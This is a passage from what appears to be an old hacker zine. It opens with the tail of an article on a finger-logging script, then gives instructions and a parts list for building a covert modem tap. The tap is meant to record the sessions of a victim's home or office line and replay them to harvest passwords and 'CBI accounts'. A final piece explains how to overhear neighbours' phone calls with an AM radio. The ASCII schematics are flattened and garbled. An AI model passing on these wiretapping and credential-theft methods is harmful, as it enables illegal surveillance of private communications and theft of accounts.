terminated, thus logging the time without an appropriate account name, and not sending the email. So far, there has only been one system where I could only use the program to log the times that I had been fingered, no account names and no email :( That's It! Of course, this is not a perfect bug free program. It should run all the time [even when you are not logged on] so you only need to run it once. If it does quit for some reason [like when the sysop kills it], you can simply restart it. For those of you privileged enough to be using Korn shell, you can add the following code to your [.profile] that will check to see if fingerLog is running whenever you log in. If it isn't, it will restart it for you. I'm sure that this can be modified to work with Bourne and C shell (if it doesn't already), but I'll leave that up to you. ps x | grep 'fingerLog' | grep -v 'grep' > /dev/null if (( $? != 0 )); then nohup fingerLog > /dev/null & fi Let me say this one more time so that there is no confusion, "This only works on your LOCAL host!!!" People who finger you from a remote host will see your [.realplan] file, just like everyone else, but they will *NOT* receive the email. It will appear in your .fingerlog as an empty account name. If and when someone does revise this to work with remote hosts (most likely using the netstat command), please email me a copy at: tdavis@garnet.acns.fsu.edu As a matter of fact, there is a lot of room for improvement. If *ANYONE* makes *ANY* revisions, please have the courtesy to email me a copy and explain what changes you have made. Thanks. Enjoy! Assembly: WinterHawk bows humbly to Cat and Fuzz. ------------------------------------------------------------------------------ +----------------------+ | Building A Modem Tap | | by: phigan | +----------------------+ Many of you have probably heard of, seen, or maybe even built a phone tap. Not a very difficult device to make. I got the idea of making a modem tap from a computer underground book that I saw over at my local Spy Headquarters (I'm not sure if this is a store that is only here in 602 or not but its got shitloads of spy equipment such as video surveillance, fake ids, useful literature, fake bombs, very small bugs, etc.). First of all, here is the schematic for making a phone tap to record to cassette. Parts ~~~~~ 1) RCA-type jack to tape recorder mic input 1) 10k(p)ohm : 20k(s) ohm transformer 1) .005 mfd capacitor Schematic ~~~~~~~~~ To line +--------------------------+ | | | | | | (+-----------+ | | | RCA | Transformer | | | jack +^^^^^^^^^^^^^+ | | +-------------+ | | | | | | | +----------------+ | | | +----------||------------+ | .005 mfd | | The main purpose for a modem tap such as this is to set it up at someone's house or maybe an office building that you know dials out with modems and you can record all the keystrokes that have been entered. With this next schematic, you can simply play the cassette back through your modem and easily print out the entire session having logged passwords and so on. Good way of getting CBI accounts also. Parts ~~~~~ 1) RCA type jack from tape recorder ext. speaker 1) 100 Ohm restistor 1) bell-type phone jack (@) Schematic ~~~~~~~~~ +-------+ ____________________ RCA jack ----| Modem | @----<_________/\/\/\_____>(+ +-------+ phone 100 Ohm jack When you have a recording of your victim's session, simply fire up your terminal program and treat it as you would any other modem connection. If you are smart enough, you may even be able to combine these two and make an acoustic modem module for a regular laptop modem (hint hint payphones hint hint). I have seen this done in a mail-order mag. It said that the acoustic module could handle 9600 baud and if you have good enough rubber cups (like they did on their model) then you will have absolutely no line noise. Anyway, if you have any problems, feel free to email me at 15660@ef.gc.maricopa.edu or you may find me on IRC as phigan on channels #phreak, #hack, or sometimes #c-64. ,,, (o o) .---------------oOO---(_)---OOo---------------. | PHiGAN/6o2 IBM/Amiga/8-Bit | | ANSi/VGA/Coding Member: NWPAC | | Hi-Res/8-Bit/Musix SysOp: | | 15660@ef.gc.maricopa.edu -The PhAcS Machine | `---------------------------------------------' ------------------------------------------------------------------------------ Phone Tapping with a personal stereo !!! brought to you by Harlequin Here in the UK, we have a reasonably secure phone system, mainly because the whole system is run by our beloved phone company British Telecom, even the private phone companies have to rent their lines off BT. BUT, due to something or other I don't entirely understand here's how to listen in to phone conversations with a personal stereo. I was lying in bed one night trying desperately to read my book, while everyone else was making enough noise to wake the dead. So, I thought, I'll put personal stereo radio onto some radio crackle to cut out everything else. I was happily reading for a while when suddenly the radio crackle was interrupted by 'ring ring, ring ring, 'ello Jon, going into work tomorrow ? Good, how's the wife.... etc etc' Fuck me ! A telephone conversation. After a bit of investigating I discovered my bed lies next to where the telephone line goes thru the wall. What I did was to tune the radio into an AM frequency, as far to the right (past 1600 kHz) as possible. This works on my personal stereo, a Sharp, model JC-512(GY), my clock radio and my mates pocket radio, but not on some other radios we've tried. It picks up local telephone calls (if there are any strong enough to be picked up) when the radio is put near a telephone socket or line (the closer the better). Computer monitors and TV's give loads of interference (try putting your the radio near one when tuned to listen for phones) so keep away from them. You can't choose what calls to listen in on, and some may be blurred beyond recognition, while others are crystal clear. Also, strangely enough if someone in the house uses the phone while your listening to conversations it doesn't effect it in any way, and you can't hear the call currently on the line. Not being an electronics hacker I can only assume it is to do with the frequency of radio waves given off by electrical devices after a certain distance travelled. But then again maybe not. This may work in other places apart from the UK as well, give it a try !